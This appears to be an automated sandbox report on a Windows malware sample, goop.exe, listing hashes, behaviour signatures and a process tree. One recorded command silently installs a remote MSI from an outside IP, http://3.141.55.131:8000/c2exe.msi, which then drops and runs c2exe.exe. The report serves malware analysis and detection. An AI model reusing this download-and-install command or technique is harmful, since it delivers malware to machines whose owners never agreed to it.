Analysis
- max time kernel: 149s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20240508-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 29/05/2024, 05:05
Static task: static1
Behavioral task: behavioral1
- Sample: goop.exe
- Resource: win7-20240221-en
Behavioral task: behavioral2
- Sample: goop.exe
- Resource: win10v2004-20240508-en
General
- Target: goop.exe
- Size: 26KB
- MD5: c731fe3c96d4c99b5e0bbfbf0beddcbd
- SHA1: 1755196df713731e92da7aef8039f958600966d1
- SHA256: cf8047d4cc968984abac31c651812624f934d6a0a246e13aa6439efc15a76437
- SHA512: 72d2cb9d130266b4baa95ac907b578d51fc6d9b8c085fdded861d34933c9a4361e73ca4820e849d34099ad67468899e2e3a37a09bc93b07dab194f0c213d4c7e
- SSDEEP: 768:sEHP8yBrsBn3HQVOaqM41v1XbV9egm3Hrdd:sEHP8yBrsyIrTXeX3X
Malware Config
Signatures
- Executes dropped EXE (1 IoC)
  - pid 3968, process c2exe.exe
- Loads dropped DLL (1 IoC)
  - pid 2104, process MsiExec.exe
- Modifies file permissions (1 TTP, 1 IoC)
  - pid 1572, process ICACLS.EXE
- Use of msiexec (install) with remote resource (1 IoC)
  - pid 4948, process msiexec.exe
- Blocklisted process makes network request (1 IoC)
  - flow 11, pid 2816, process msiexec.exe
- Enumerates connected drives (3 TTPs, 23 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  - File opened (read-only) by msiexec.exe: \??\Q:, \??\R:, \??\B:, \??\M:, \??\O:, \??\N:, \??\S:, \??\T:, \??\Y:, \??\G:, \??\I:, \??\L:, \??\P:, \??\U:, \??\A:, \??\H:, \??\K:, \??\W:, \??\X:, \??\Z:, \??\E:, \??\J:, \??\V:
- Drops file in Windows directory (7 IoCs)
  - File created: C:\Windows\Installer\inprogressinstallinfo.ipi (msiexec.exe)
  - File opened for modification: C:\Windows\Installer\MSI5082.tmp (msiexec.exe)
  - File opened for modification: C:\Windows\LOGS\DPX\setupact.log (EXPAND.EXE)
  - File opened for modification: C:\Windows\LOGS\DPX\setuperr.log (EXPAND.EXE)
  - File opened for modification: C:\Windows\Installer\MSI4DA3.tmp (msiexec.exe)
  - File opened for modification: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log (msiexec.exe)
  - File opened for modification: C:\Windows\Installer\ (msiexec.exe)
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  - pid 3456, process goop.exe (2 entries)
  - pid 2816, process msiexec.exe (2 entries)
- Suspicious use of AdjustPrivilegeToken (37 IoCs)
  - pid 3456, goop.exe: SeDebugPrivilege
  - pid 4948, msiexec.exe: SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
  - pid 2816, msiexec.exe: SeSecurityPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege
- Suspicious use of WriteProcessMemory (13 IoCs)
  - PID 3456 (goop.exe) wrote to memory of 4948, procid_target 85 (2 entries)
  - PID 2816 (msiexec.exe) wrote to memory of 2104, procid_target 90 (3 entries)
  - PID 2104 (MsiExec.exe) wrote to memory of 1572, procid_target 93 (3 entries)
  - PID 2104 (MsiExec.exe) wrote to memory of 3956, procid_target 95 (3 entries)
  - PID 2104 (MsiExec.exe) wrote to memory of 3968, procid_target 97 (2 entries)
Processes
- C:\Users\Admin\AppData\Local\Temp\goop.exe (PID 3456)
  Command line: "C:\Users\Admin\AppData\Local\Temp\goop.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\msiexec.exe (PID 4948)
    Command line: "C:\Windows\system32\msiexec.exe" /quiet /i http://3.141.55.131:8000/c2exe.msi
    - Use of msiexec (install) with remote resource
    - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\msiexec.exe (PID 2816)
  Command line: C:\Windows\system32\msiexec.exe /V
  - Blocklisted process makes network request
  - Enumerates connected drives
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Windows\syswow64\MsiExec.exe (PID 2104)
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 8B7B4AFA4A92417B92ECB1421A98256B
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\ICACLS.EXE (PID 1572)
      Command line: "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-47fbb461-2cad-4354-890a-04ae3bfd5ebc\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
      - Modifies file permissions
    - C:\Windows\SysWOW64\EXPAND.EXE (PID 3956)
      Command line: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
      - Drops file in Windows directory
    - C:\Users\Admin\AppData\Local\Temp\MW-47fbb461-2cad-4354-890a-04ae3bfd5ebc\files\c2exe.exe (PID 3968)
      Command line: "C:\Users\Admin\AppData\Local\Temp\MW-47fbb461-2cad-4354-890a-04ae3bfd5ebc\files\c2exe.exe"
      - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Downloads